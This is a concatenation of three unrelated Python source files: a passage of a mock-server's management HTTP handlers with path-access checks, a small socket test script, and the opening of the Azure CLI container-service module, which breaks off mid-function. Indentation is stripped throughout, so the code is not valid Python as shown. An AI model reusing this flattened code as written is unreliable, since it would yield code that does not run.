self.check_path_empty(path)
path = os.path.abspath(os.path.join(cwd, path.lstrip('/')))
self.check_path_access(cwd, path, orig_path)
# path is SAFE
if self.request.files:
for key, files in self.request.files.items():
for file in files:
if path is None:
file_path = os.path.join(cwd, key if key else file['filename'])
else:
file_path = os.path.join(path, key if key else file['filename'])
file_path = os.path.abspath(file_path)
self.check_path_access(cwd, file_path, file_path)
# file_path is SAFE
self.check_path_is_not_directory(file_path, file_path[len(cwd) + 1:])
self.check_if_path_defined_in_configuration_file(file_path, file_path[len(cwd) + 1:])
# file_path is OK
os.makedirs(os.path.dirname(file_path), exist_ok=True)
with open(file_path, 'wb') as _file:
_file.write(file['body'])
else:
file = self.get_body_argument('file', default=None)
self.check_parameter_required(file, 'file')
self.check_parameter_required(path, 'path')
self.check_path_is_not_directory(path, orig_path)
self.check_if_path_defined_in_configuration_file(path, orig_path)
# path is OK
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, 'w') as _file:
_file.write(file)
self.set_status(204)
except InternalResourcePathCheckError:
return
async def delete(self):
cwd = self.http_server.definition.source_dir
path = self.get_query_argument('path', default=None)
keep = self.get_query_argument('keep', default=False)
orig_path = path
try:
self.check_parameter_required(path, 'path')
self.check_path_empty(path)
path = os.path.abspath(os.path.join(cwd, path.lstrip('/')))
self.check_path_access(cwd, path, orig_path)
# path is SAFE
self.check_path_exists(path, orig_path)
self.check_if_path_defined_in_configuration_file(path, orig_path)
# path is OK
except InternalResourcePathCheckError:
return
if os.path.isfile(path):
os.remove(path)
if not keep:
ref = os.path.dirname(path)
while ref:
if os.listdir(ref) or ref == cwd: # pragma: no cover
break
shutil.rmtree(ref)
ref = os.path.dirname(ref)
elif os.path.isdir(path):
shutil.rmtree(path)
self.set_status(204)
def check_path_empty(self, path: str) -> None:
if not path:
self.set_status(400)
self.write('\'path\' cannot be empty!')
raise InternalResourcePathCheckError()
def check_path_access(self, cwd: str, path: str, orig_path: str) -> None:
if not path.startswith(cwd):
self.set_status(403)
self.write('The path %s couldn\'t be accessed!' % orig_path)
raise InternalResourcePathCheckError()
def check_path_exists(self, path: str, orig_path: str) -> None:
if not os.path.exists(path):
self.set_status(400)
self.write('The path %s does not exist!' % orig_path)
raise InternalResourcePathCheckError()
def check_parameter_required(self, obj: str, subject: str) -> None:
if obj is None:
self.set_status(400)
self.write('\'%s\' parameter is required!' % subject)
raise InternalResourcePathCheckError()
def check_path_is_not_directory(self, path: str, orig_path: str) -> None:
if os.path.isdir(path):
self.set_status(400)
self.write('The path %s is a directory!' % orig_path)
raise InternalResourcePathCheckError()
def check_if_path_defined_in_configuration_file(self, path: str, orig_path: str) -> None:
if path not in self.files_abs:
self.set_status(400)
self.write('The path %s is not defined in the configuration file!' % orig_path)
raise InternalResourcePathCheckError()
class ManagementServiceRootHandler(ManagementBaseHandler):
async def get(self):
with open(os.path.join(__location__, 'res/management.html'), 'r') as file:
html = file.read()
self.write(html)
class ManagementServiceRootRedirectHandler(ManagementBaseHandler):
def initialize(self, management_root):
self.management_root = management_root
async def get(self):
self.redirect('/%s/' % self.management_root)
class ManagementServiceConfigHandler(ManagementConfigHandler):
"""This handler is only valid for HTTP services and should always operate on `ConfigHttpService`."""
def initialize(self, http_server, service_id):
self.http_server = http_server
self.service_id = service_id
async def get(self):
data = self.http_server.definition.data['services'][self.service_id]
self.dump(data)
async def post(self):
data = self.decode()
definition = self.http_server.definition
if data is None:
return
imaginary_config = copy.deepcopy(definition.data)
imaginary_config['services'][self.service_id] = data
# This check fails for asynchronous services
if not self.validate(imaginary_config) or not self.check_restricted_fields(data, self.service_id):
return
internal_http_service_id = definition.services[self.service_id].internal_http_service_id
config_root_builder = ConfigRootBuilder()
# `service` should always be an instance of `ConfigHttpService`
service = config_root_builder.build_config_service(data, internal_service_id=self.service_id)
definition.config_root.services[self.service_id].destroy()
definition.config_root.services[self.service_id] = service
definition.logs.update_service(self.service_id, service.get_name())
definition.stats.update_service(self.service_id, service.get_hint())
definition.services[self.service_id] = definition.analyze_http_service(
service,
definition.template_engine,
definition.rendering_queue,
performance_profiles=definition.config_root.performance_profiles,
global_performance_profile=None if definition.config_root.globals is None else definition.config_root.globals.performance_profile,
internal_http_service_id=internal_http_service_id
)
definition.data['services'][self.service_id] = data
self.update_service(definition.services[self.service_id], self.service_id)
self.set_status(204)
class ManagementServiceStatsHandler(ManagementBaseHandler):
def initialize(self, stats, service_id):
self.stats = stats
self.service_id = service_id
async def get(self):
self.write(self.stats.services[self.service_id].json())
async def delete(self):
self.stats.services[self.service_id].reset()
self.set_status(204)
class ManagementServiceLogsHandler(ManagementBaseHandler):
def initialize(self, logs, service_id):
self.logs = logs
self.service_id = service_id
async def get(self):
self.write(self.logs.services[self.service_id].json())
async def post(self):
self.logs.services[self.service_id].enabled = not (
self.get_body_argument('enable', default=True) in ('false', 'False', '0')
)
self.set_status(204)
async def delete(self):
self.write(self.logs.services[self.service_id].json())
self.logs.services[self.service_id].reset()
class ManagementServiceResetIteratorsHandler(ManagementBaseHandler):
"""This handler is only valid for HTTP services and should always operate on `HttpService`."""
def initialize(self, http_server, service_id):
self.http_server = http_server
self.service_id = service_id
async def post(self):
app = None
# `service` should always be an instance of `HttpService`
service = self.http_server.definition.services[self.service_id]
app = self.http_server._apps.apps[service.internal_http_service_id]
_reset_iterators(app)
self.set_status(204)
class ManagementServiceUnhandledHandler(ManagementUnhandledHandler):
def initialize(self, http_server, service_id):
self.http_server = http_server
self.service_id = service_id
async def get(self):
data = {
'services': []
}
service = self.http_server.definition.services[self.service_id]
data['services'].append(dict((k, getattr(service, k)) for k in UNHANDLED_SERVICE_KEYS if getattr(service, k) is not None))
data['services'][0]['endpoints'] = self.build_unhandled_requests(self.service_id)
imaginary_config = copy.deepcopy(self.http_server.definition.data)
imaginary_config['services'] = data['services']
unhandled_data_enabled = False
service = self.http_server.definition.services[self.service_id]
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
if rule.target_kwargs['unhandled_data']:
unhandled_data_enabled = True
break
self.set_header('x-%s-unhandled-data' % PROGRAM.lower(), 'true' if unhandled_data_enabled else 'false')
if not self.validate(imaginary_config): # pragma: no cover
return
self.dump(data)
async def post(self):
data = self.get_query_argument('data', default=None)
if data is None:
data = self.request.body.decode()
unhandled_data = self.http_server.unhandled_data if data not in (None, False, 'false', 'False', 'None') else None
# `service` should always be an instance of `HttpService`
service = self.http_server.definition.services[self.service_id]
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
rule.target_kwargs['unhandled_data'] = unhandled_data
self.set_status(204)
async def delete(self):
for key, _ in self.http_server.unhandled_data.requests[self.service_id].items():
self.http_server.unhandled_data.requests[self.service_id][key] = []
self.set_status(204)
class ManagementServiceOasHandler(ManagementOasHandler):
def initialize(self, http_server, service_id):
self.http_server = http_server
self.service_id = service_id
async def get(self):
self.write(self.build_oas(self.service_id))
class ManagementServiceTagHandler(ManagementBaseHandler):
"""This handler is only valid for HTTP services and should always operate on `HttpService`."""
def initialize(self, http_server, service_id):
self.http_server = http_server
self.service_id = service_id
async def get(self):
# `service` should always be an instance of `HttpService`
service = self.http_server.definition.services[self.service_id]
tags = None
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
tags = rule.target_kwargs['tags']
if not tags:
self.set_status(204)
else:
data = {
'tags': tags
}
self.write(data)
async def post(self):
data = self.get_query_argument('current', default=None)
if data is None:
data = self.request.body.decode()
data = data.split(',')
# `service` should always be an instance of `HttpService`
service = self.http_server.definition.services[self.service_id]
for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
if rule.target == GenericHandler:
rule.target_kwargs['tags'] = data
self.set_status(204)
class UnhandledData:
def __init__(self):
self.requests = []
class ManagementAsyncHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def get(self):
data = {
'producers': [],
'consumers': []
}
for producer in AsyncProducer.producers:
data['producers'].append(producer.info())
for consumer in AsyncConsumer.consumers:
data['consumers'].append(consumer.info())
self.dump(data)
def dump(self, data) -> None:
_format = self.get_query_argument('format', default='json')
if _format == 'yaml':
self.set_header('Content-Type', 'application/x-yaml')
self.write(yaml.dump(data, sort_keys=False))
else:
self.write(data)
class ManagementAsyncProducersHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def post(self, value):
if value.isnumeric():
try:
index = int(value)
producer = AsyncProducer.producers[index]
try:
producer.check_tags()
producer.check_payload_lock()
producer.check_dataset_lock()
t = threading.Thread(target=producer.produce, args=(), kwargs={
'ignore_delay': True
})
t.daemon = True
t.start()
self.set_status(202)
self.write(producer.info())
except (
AsyncProducerListHasNoPayloadsMatchingTags,
AsyncProducerPayloadLoopEnd,
AsyncProducerDatasetLoopEnd
) as e:
self.set_status(410)
self.write(str(e))
return
except IndexError:
self.set_status(400)
self.write('Invalid producer index!')
return
else:
producer = None
actor_name = unquote(value)
for service in AsyncService.services:
for actor in service.actors:
if actor.name == actor_name:
if actor.producer is None: # pragma: no cover
continue
producer = actor.producer
try:
producer.check_tags()
producer.check_payload_lock()
producer.check_dataset_lock()
t = threading.Thread(target=actor.producer.produce, args=(), kwargs={
'ignore_delay': True
})
t.daemon = True
t.start()
except (
AsyncProducerListHasNoPayloadsMatchingTags,
AsyncProducerPayloadLoopEnd,
AsyncProducerDatasetLoopEnd
) as e:
self.set_status(410)
self.write(str(e))
return
if producer is None:
self.set_status(400)
self.write('No producer actor is found for: %r' % actor_name)
return
else:
self.set_status(202)
self.write(producer.info())
class ManagementAsyncConsumersHandler(ManagementBaseHandler):
def initialize(self, http_server):
self.http_server = http_server
async def get(self, value):
if value.isnumeric():
try:
index = int(value)
consumer = AsyncConsumer.consumers[index]
self.write(consumer.single_log_service.json())
except IndexError:
self.set_status(400)
self.write('Invalid consumer index!')
return
else:
consumer = None
actor_name = unquote(value)
for service_id, service in enumerate(AsyncService.services):
for actor_id, actor in enumerate(service.actors):
if actor.name == actor_name:
if actor.consumer is None: # pragma: no cover
continue
consumer = actor.consumer
if consumer is None:
self.set_status(400)
self.write('No consumer actor is found for: %r' % actor_name)
return
else:
self.write(consumer.single_log_service.json())
async def delete(self, value):
if value.isnumeric():
try:
index = int(value)
consumer = AsyncConsumer.consumers[index]
consumer.single_log_service.reset()
self.set_status(204)
except IndexError:
self.set_status(400)
self.write('Invalid consumer index!')
return
else:
consumer = None
actor_name = unquote(value)
for service_id, service in enumerate(AsyncService.services):
for actor_id, actor in enumerate(service.actors):
if actor.name == actor_name:
if actor.consumer is None: # pragma: no cover
continue
consumer = actor.consumer
if consumer is None:
self.set_status(400)
self.write('No consumer actor is found for: %r' % actor_name)
return
else:
consumer.single_log_service.reset()
self.set_status(204)
|
test_local.py | import interface_c_python_location
import interface_c_python_commands
import logging
import os
import threading
logging.basicConfig(level=logging.DEBUG)
if os.path.exists("socketLocation"):
os.remove("socketLocation")
if os.path.exists("socketCommands"):
os.remove("socketCommands")
interface_loc = interface_c_python_location.SocketLocation()
interface_com = interface_c_python_commands.SocketCommands()
try:
t1 = threading.Thread(target=interface_loc.run)
t2 = threading.Thread(target=interface_com.run)
t1.start()
t2.start()
t1.join()
t2.join()
except Exception as e:
print (f'Exception {e}')
# socket = interface_c_python_location.SocketServer()
# if os.path.exists("socketCommands"):
# os.remove("socketCommands") |
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from urllib.request import urlopen
from urllib.error import URLError
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError,
AzureInternalError,
FileOperationError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import (CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_SECRET_ROTATION_ENABLED,
CONST_ROTATION_POLL_INTERVAL)
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
from ._consts import DecoratorEarlyExitException
from .addonconfiguration import (
add_monitoring_role_assignment,
add_ingress_appgw_addon_role_assignment,
add_virtual_node_role_assignment,
ensure_default_log_analytics_workspace_for_monitoring,
ensure_container_insights_for_monitoring,
)
from ._resourcegroup import get_rg_location
from ._validators import extract_comma_separated_string
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def get_cmd_test_hook_data(filename):
hook_data = None
curr_dir = os.path.dirname(os.path.realpath(__file__))
test_hook_file_path = os.path.join(curr_dir, 'tests/latest/data', filename)
if os.path.exists(test_hook_file_path):
with open(test_hook_file_path, "r") as f:
hook_data = json.load(f)
return hook_data
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cmd, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cmd.cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cmd, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except CLIError as ex:
logger.warning(str(ex))
except Exception as ex: # pylint: disable=broad-except
logger.error(str(ex))
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None, is_service_principal=True):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
